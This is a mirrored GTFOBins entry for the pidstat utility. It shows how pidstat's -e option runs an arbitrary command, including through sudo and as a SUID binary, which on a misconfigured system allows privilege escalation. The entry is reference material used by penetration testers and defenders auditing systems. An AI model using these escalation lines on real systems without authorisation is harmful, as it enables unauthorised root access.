1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/pidstat.md
Madesh Turaka 7bc41773f6
Add pidstat
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-01 11:39:54 +02:00

16 lines
236 B
Markdown

---
functions:
command:
- code: |
COMMAND=id
pidstat -e $COMMAND
sudo:
- code: |
COMMAND=id
sudo pidstat -e $COMMAND
suid:
- code: |
COMMAND=id
./pidstat -e $COMMAND
---